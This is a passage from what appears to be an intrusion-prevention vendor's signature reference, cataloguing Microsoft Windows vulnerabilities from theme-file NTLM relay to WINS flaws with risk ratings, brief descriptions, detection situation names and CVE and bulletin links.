MS09-042
http://technet.microsoft.com/security/bulletin/MS09-042
Back to top

Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1757-5242
Last changed: sgpkg-ips-1757-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of multiple fields within ".theme" files. A remote attacker could exploit this vulnerability by enticing a target user in to downloading a crafted Theme file. Successful exploitation could result in the disclosure of a targeted user's NTLM hashes.
Situation: File-Text_Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay
References:
CVE-2024-38030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38030
ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul
Back to top

Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Improper validation of the Path field within ".theme" files causes an NTLM relay vulnerability in various versions of Windows. A successful exploitation may lead to the disclosure of NTLM hashes.
Situation: File-Text_Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay
References:
CVE-2025-21308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21308
Back to top

Microsoft-Windows-Themes-Reviseversionifnecessary-Race-Condition

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Windows
Software: <os>
Type: Race Condition
Description: A race condition vulnerability exists in Microsoft Windows. The vulnerability is due to a Time-of-check Time-of-use (TOCTOU) bug in the signature validation process for a DLL library loaded while opening a ".theme" or ".themepack" file. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted Theme file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition
References:
CVE-2023-38146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38146
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service

About this vulnerability: A vulnerability in the Microsoft Windows TLS library.
Risk: High
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in the Microsoft Windows TLS library, multiple versions, which allows remote attackers to cause a denial of service condition by sending crafted Key Exchange messages to the server during a TLS handshake, due to improper handling of certain key exchanges in TLS.
Situation: Generic_CS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
TLS_SS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
References:
CVE-2020-1118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1118
Back to top

Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A denial of service vulnerability exists in the Windows TCP/IP stack. A successful exploitation of this vulnerability can lead to a target system to stop responding.
Situation: IPv6_Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899
References:
CVE-2020-16899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16899
ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct
Back to top

Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Critical
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: A remote code execution vulnerability exists in the Windows TCP/IP stack. A successful exploitation of this vulnerability can lead to arbitrary code execution on the target server or client.
Situation: IPv6_Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898
References:
CVE-2020-16898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898
ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct
Back to top

Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There exists a code execution vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution
References:
CVE-2015-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0059
BID-72470
http://www.securityfocus.com/bid/72470
OSVDB-118179
http://www.osvdb.org/118179
MS15-010
http://technet.microsoft.com/security/bulletin/MS15-010
Back to top

Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Binary_Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402
References:
CVE-2011-3402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402
MS11-087
http://technet.microsoft.com/security/bulletin/MS11-087
Back to top

Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1235-5242
Last changed: sgpkg-ips-1408-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: An attempt to exploit a vulnerability in the font library of Microsoft Windows. This situation also covers the vulnerability CVE-2020-0938.
Situation: File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-2
File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-1
Back to top

Microsoft-Windows-Uniscribe-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Microsoft Windows Uniscribe component. The vulnerability is due to improper handling of Format 14 cmap subtable in font files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page or document. Successful exploitation could result in arbitrary code execution under the security context of the logged in user.
Situation: File-Binary_Microsoft-Windows-Uniscribe-Integer-Overflow
References:
CVE-2016-7274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7274
MS16-147
http://technet.microsoft.com/security/bulletin/MS16-147
Back to top

Microsoft-Windows-UPnP-Service-Remote-Code-Execution

About this vulnerability: Buffer overflow vulnerability in Microsoft Windows Unversal Plug and Play service
Risk: High
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-1589-5242
Platform: Windows XP SP2; Windows XP 64-bit SP0; Windows XP 64-bit SP2
Software: <os>
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in the Microsoft Windows Universal Plug and Play service. The vulnerability is due to a failure to handle specially crafted HTTP requests. A remote attacker can exploit this vulnerability to cause a denial of service condition, or inject and execute arbitrary code on the target system with the privileges of the Local Service account.
Situation: HTTP_CS-Microsoft-Windows-UPnP-Service-Remote-Code-Execution
References:
CVE-2007-1204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1204
BID-23371
http://www.securityfocus.com/bid/23371
OSVDB-34010
http://www.osvdb.org/34010
MS07-019
http://technet.microsoft.com/security/bulletin/MS07-019
Back to top

Microsoft-Windows-URI-Handler-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows detected
Risk: High
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Windows detected.
Situation: File-Text_Microsoft-Windows-URI-Handler-Remote-Code-Execution
Back to top

Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There has been reported a memory corruption vulnerability in the Microsoft Windows VBScript engine. Successful exploitation could lead to arbitrary code execution.
Situation: File-Text_Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free
References:
CVE-2018-8373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373
Back to top

Microsoft-Windows-VBScript-Engine-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: An information disclosure vulnerability exists in the Microsoft's VBScript engine. The vulnerability is due an error in processing certain types of script code, allowing a user to disclose memory contents of the current process. By enticing a user to open a web page, an attacker could exploit this vulnerability to bypass the ASLR security feature which can be used to facilitate further attacks.
Situation: File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure
References:
CVE-2015-6052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6052
MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106
Back to top

Microsoft-Windows-VBScript-Help-File-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-290-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Input Validation
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution
HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution-2
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution-2
References:
CVE-2010-0483
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0483
BID-38463
http://www.securityfocus.com/bid/38463
OSVDB-62632
http://www.osvdb.org/62632
MS10-022
http://technet.microsoft.com/security/bulletin/MS10-022
Back to top

Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: An information disclosure vulnerability exists in the Microsoft's VBScript engine. The vulnerability is due an error while processing regular expressions which allows a user to disclose memory contents of the current process. By enticing a user to open a web page, an attacker could exploit this vulnerability to bypass the ASLR security feature which can be used to facilitate further attacks.
Situation: File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure
References:
CVE-2015-1684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1684
MS15-053
http://technet.microsoft.com/security/bulletin/MS15-053
Back to top

Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution

About this vulnerability: A vulnerability in Windows Vista
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista
Software: <os>
Type: Input Validation
Description: A code execution vulnerability exists in Windows Vista Contacts Gadget that could allow an attacker to run code with the privileges of the logged on user.
Situation: File-TextId_Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution
References:
CVE-2007-3032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3032
BID-25304
http://www.securityfocus.com/bid/25304
MS07-048
http://technet.microsoft.com/security/bulletin/MS07-048
Back to top

Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows Vista
Software: <os>
Type: Input Validation
Description: There exists a cross site scripting vulnerability in Microsoft Windows Vista Feed Headlines gadget. The vulnerability is caused due to lack of input validation when parsing RSS feeds. A remote attacker can exploit this vulnerability by convincing a target user to subscribe to a malicious RSS feed, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user. In a successful attack scenario, the attacker can inject Javascript code that will download and execute a malicious binary. The behaviour of the system is dependent on the nature of the executed code that would execute in the security context of the currently logged in user.
Situation: File-TextId_Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution
References:
CVE-2007-3033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3033
BID-25287
http://www.securityfocus.com/bid/25287
MS07-048
http://technet.microsoft.com/security/bulletin/MS07-048
Back to top

Microsoft-Windows-Vista-Windows-Mail-File-Execution

About this vulnerability: A vulnerability in Microsoft Windows Mail
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Mail product. The vulnerability is due to insufficient validation of URLs in incoming emails. A remote attacker can exploit this vulnerability by enticing a target user to open an email message and click on a specially crafted URL within the message which refers to an executable file on the client system. Successful exploitation would allow for arbitrary command execution with the privileges of the currently logged-in user. The vulnerable program (Windows Mail) may not show any abnormal behaviour when this vulnerability is triggered. The behaviour of the target host, however, is entirely dependent on the intended function of the executed file. The file in such a case would execute within the security context of the current user.
Situation: File-Text_Microsoft-Windows-Vista-Windows-Mail-File-Execution
References:
CVE-2007-1658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1658
BID-23103
http://www.securityfocus.com/bid/23103
MS07-034
http://technet.microsoft.com/security/bulletin/MS07-034
Back to top

Microsoft-Windows-Vulnerability-CVE-2017-0016

About this vulnerability: Detected an attempt to exploit a vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A DoS vulnerability in Microsoft Windows.
Situation: NetBIOS-TCP_Microsoft-Windows-Vulnerability-CVE-2017-0016
Generic_CS-Microsoft-Windows-Vulnerability-CVE-2017-0016
SMB-TCP_SHS-SMB2-Tree-Connect-Response-Too-Long
References:
CVE-2017-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0016
Back to top

Microsoft-Windows-Vulnerability-CVE-2020-17140

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1301-5242
Last changed: sgpkg-ips-1301-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An information disclosure vulnerability has been reported in the SMBv2 component of Microsoft Windows SMB. Successful exploitation results in the disclosure of information which could be used to obtain information to further compromise the user's system.
Situation: SMB-TCP_Microsoft-Windows-Vulnerability-CVE-2020-17140
References:
CVE-2020-17140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140
ms20-dec
http://technet.microsoft.com/security/bulletin/ms20-dec
Back to top

Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An insecure library loading vulnerability has been reported in Microsoft Windows. The vulnerability is due to a design weakness exhibited during DLL loading. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file from an SMB or a WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user. Microsoft has not released an advisory or patch for this vulnerability.
Situation: HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading
Back to top

Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Microsoft Windows WebDAV Mini-Redirector
Risk: Moderate
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows WebDAV Mini-Redirector
Type: Buffer Overflow
Description: The Microsoft Windows WebDAV Mini-Redirector suffers from a remote code execution vulnerability. If a WebDAV server response contains a sufficiently long resource name string, an integer overflow may occur in the validation of the field's length. This leads to the field name being copied into a buffer that is 0x208 bytes long, resulting in a buffer overflow. The vulnerability can be used to execute arbitrary code, or to cause a kernel-level exception and crash Windows.
Situation: HTTP_SS-Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
File-TextId_Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
References:
CVE-2008-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080
BID-27670
http://www.securityfocus.com/bid/27670
MS08-007
http://technet.microsoft.com/security/bulletin/MS08-007
Back to top

Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 2003
Software: <os>
Type: Integer Overflow
Description: A vulnerability has been reported in the WebDAV Mini-Redirector component of Microsoft Windows. The flaw can be triggered during the processing of WebDAV responses, causing a heap overflow. An attacker can exploit this vulnerability by persuading the target user to connect to a malicious WebDAV server.
Situation: File-TextId_Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow
References:
CVE-2008-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080
BID-27670
http://www.securityfocus.com/bid/27670
MS08-007
http://technet.microsoft.com/security/bulletin/MS08-007
Back to top

Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There has been reported a heap buffer overflow vulnerability in Microsoft Windows. A remote attacker could exploit this vulnerability by having the target user to open a maliciously crafted WIM file on the target system. Successful exploitation can result in the arbitrary code execution.
Situation: File-Binary_Microsoft-Windows-Wimgapi-Readintegrityinfo-Heap-Buffer-Overflow
References:
CVE-2018-8210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8210
Back to top

Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003
Software: <os>
Type: Integer Overflow
Description: A integer overflow vulnerability exists in Microsoft Windows. The flaw is due to the way kernel-mode driver parses EOT font files.
Situation: HTTP_SS-Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
File-Binary_Microsoft-Windows-Win32k-EOT-Parsing-Integer-Overflow
References:
CVE-2009-2514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2514
BID-36029
http://www.securityfocus.com/bid/36029
MS09-065
http://technet.microsoft.com/security/bulletin/MS09-065
Back to top

Microsoft-Windows-Win32k.sys-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-438-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability has been reported in the Microsoft Windows kernel file win32k.sys. The public proof of concept triggers the vulnerability through a specially sized iFrame opened with the Safari web browser. A remote, unauthenticated attacker can also be trigger this vulnerability by enticing a user to visit a specially crafted web page with the vulnerable application. Successful exploitation could result in arbitrary code execution with kernel privileges. Note: This vulnerability has been confirmed by Secunia on a fully patched installation of Windows 7 64 bit, other versions may also be vulnerable.
Situation: File-Text_Microsoft-Windows-Win32k.sys-Memory-Corruption
References:
CVE-2011-5046
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5046
BID-51122
http://www.securityfocus.com/bid/51122
OSVDB-77908
http://www.osvdb.org/77908
MS12-008
http://technet.microsoft.com/security/bulletin/MS12-008
Back to top

Microsoft-Windows-Windows-Script-Host-Command-Injection

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Windows
Situation: HTTP_SHS-Microsoft-Windows-Windows-Script-Host-Command-Injection
File-Text_Microsoft-Windows-Windows-Script-Host-Command-Injection
References:
CVE-2018-8495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8495
Back to top

Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-557-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 8; Windows RT; Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012
Software: <os>
Type: Malfunction
Description: A security bypass vulnerability exists in Microsoft Windows. The vulnerability is due to an error in the way WinVerifyTrust validates PE files signed with Windows Authenticode. The error allows signed PE files to be modified without impacting the signature's validation. A remote attacker can leverage this vulnerability by enticing a target user to open a crafted signed PE file. In successful attack scenarios, untrusted attacker-controlled code can be copied and executed on a target machine within the context of the currently logged in user.
Situation: File-Exe_Microsoft-Windows-WinVerifyTrust-PE-Validation-Security-Bypass
References:
CVE-2013-3900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3900
OSVDB-100765
http://www.osvdb.org/100765
MS13-098
http://technet.microsoft.com/security/bulletin/MS13-098
Back to top

Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 7; Windows 2008
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Exe_Microsoft-Windows-WinVerifyTrust-Signature-Validation-CVE-2012-0151
References:
CVE-2012-0151
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0151
OSVDB-81135
http://www.osvdb.org/81135
MS12-024
http://technet.microsoft.com/security/bulletin/MS12-024
Back to top

Microsoft-Windows-WMF-File-Parsing-DOS

About this vulnerability: Microsoft Windows WMF File Parsing DOS
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a vulnerability in Microsoft Internet explorer. A remote attacker can exploit this by sending a specially crafted WMF file to the vulnerable client.
Situation: File-Binary_Microsoft-Windows-WMF-File-Parsing-DOS
Back to top

Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Two code execution vulnerabilities exist in Microsoft Windows Wordpad converter. A remote attacker can exploit these vulnerabilities by enticing a target user to access a crafted Word 97 file. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may terminate the affected application.
Situation: File-OLE_Microsoft-Windows-WordPad-Converter-Parsing-Memory-Corruption
References:
CVE-2011-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0028
MS11-033
http://technet.microsoft.com/security/bulletin/MS11-033
Back to top

Microsoft-Windows-Workstation-Service-NetrGetJoinInformation-Heap-Corruption

About this vulnerability: Heap corruption vulnerability in Windows Workstation Service
Risk: Moderate
First detected in: sgpkg-ips-238-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft Windows Workstation Service suffers from a heap corruption vulnerability in the handling of NetrGetJoinInformation requests. A specially crafted request may cause heap corruption and allow remote attackers to execute arbitrary code on vulnerable systems.
Situation: MSRPC-TCP_CPS-CA-Microsoft-Windows-WKSSVC-NetrGetJoinInformation-Heap-Corruption
References:
CVE-2009-1544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1544
BID-35972
http://www.securityfocus.com/bid/35972
MS09-041
http://technet.microsoft.com/security/bulletin/MS09-041
Back to top

Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS

About this vulnerability: A vulnerability in Microsoft Windows Workstation Service allows denial of service
Risk: Low
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Resource Starvation
Description: There is a vulnerability in the Microsoft Windows Workstation Service. A malicious MSRPC request can allocate excessive amount of memory, which may cause denial of service.
Situation: MSRPC-TCP_CPS-Microsoft-Windows-Workstation-Service-NetrWkstaUserEnum-DoS
References:
CVE-2006-6723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6723
Back to top

Microsoft-Windows-Write-AndX-SMB-Processing-DOS

About this vulnerability: Denial of service vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft Windows. By sending a crafted WRITE_ANDX command, a remote attacker can cause system-wide denial of service on the vulnerable host.
Situation: SMB-TCP_CHS-Microsoft-Windows-Write-AndX-SMB-Processing-DOS
References:
CVE-2008-4114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4114
BID-31179
http://www.securityfocus.com/bid/31179
OSVDB-48153
http://www.osvdb.org/48153
MS09-001
http://technet.microsoft.com/security/bulletin/MS09-001
Back to top

Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2003; Windows 2008; Windows 2012
Software: <os>
Type: Malfunction
Description: A denial of service vulnerability exists in Microsoft Windows. The flaw is due to improper handling of specially crafted X.509 certificates during certificate validation. A remote attacker can exploit this vulnerability by sending a specially crafted X.509 certificate to a web service. Successful exploitation could cause a denial of service condition where the web service becomes unresponsive.
Situation: HTTP_CS-Microsoft-Windows-X.509-Certificate-Validation-Denial-Of-Service
References:
CVE-2013-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3869
OSVDB-99649
http://www.osvdb.org/99649
MS13-095
http://technet.microsoft.com/security/bulletin/MS13-095
Back to top

Microsoft-Windows-XP-Large-Image-Resize-DoS

About this vulnerability: A vulnerability in Windows XP
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: <os>
Type: Malfunction
Description: While rendering a normal image with excessively large resizing parameters in an HTML page, numerous applications could cause a infinite loop in the FrameBuffer display driver of Windows and eventually crash the system, leading to a Denial of Service condition.
Situation: File-Text_Microsoft-Windows-XP-Large-Image-Resize-DoS
Back to top

Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There is a vulnerability in the way Microsoft Winhlp32 calculates a length value from values taken from a help (.hlp) file. Specially crafted values can lead to an integer overflow. This flaw results in a memory copy operation leading to a heap-based buffer overflow. An attacker can exploit this vulnerability to execute arbitrary code in the context of the current user. In a simple exploit attempt, an instance of winhlp32 will attempt to process the specially crafted file with a .hlp extension. When the memory copy process is called from the vulnerable function, the application will terminate with a memory access violation error. In a more sophisticated attack case, possibly involving code execution, the process flow will be diverted. In such a case, the behavior of the target is dependent on the attacker's malicious intentions.
Situation: File-Binary_Microsoft-Winhlp32-Compressed-Phrase-Integer-Overflow
References:
CVE-2004-1361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1361
BID-12091
http://www.securityfocus.com/bid/12091
Back to top

Microsoft-WINS-DoS

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The WINS (Windows Internet Naming Service) Service under Windows 2003 is vulnerable to a Denial of Service from a remote attacker. It may be possible to perform a remote code execution attack using this vulnerability.
Situation: Generic_UDP-Microsoft-WINS-DoS
References:
CVE-2003-0825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0825
BID-9624
http://www.securityfocus.com/bid/9624
Back to top

Microsoft-WINS-Memory-Overwrite-CVE-2008-1451

About this vulnerability: A vulnerability in Microsoft WINS Service
Risk: High
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows 2003
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows Name Service (WINS).
Situation: WINS_CS-Microsoft-WINS-Memory-Overwrite-CVE-2008-1451
References:
CVE-2008-1451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1451
BID-29588
http://www.securityfocus.com/bid/29588
MS08-034
http://technet.microsoft.com/security/bulletin/MS08-034
Back to top

Microsoft-WINS-Server-WPAD-Registration-Spoofing

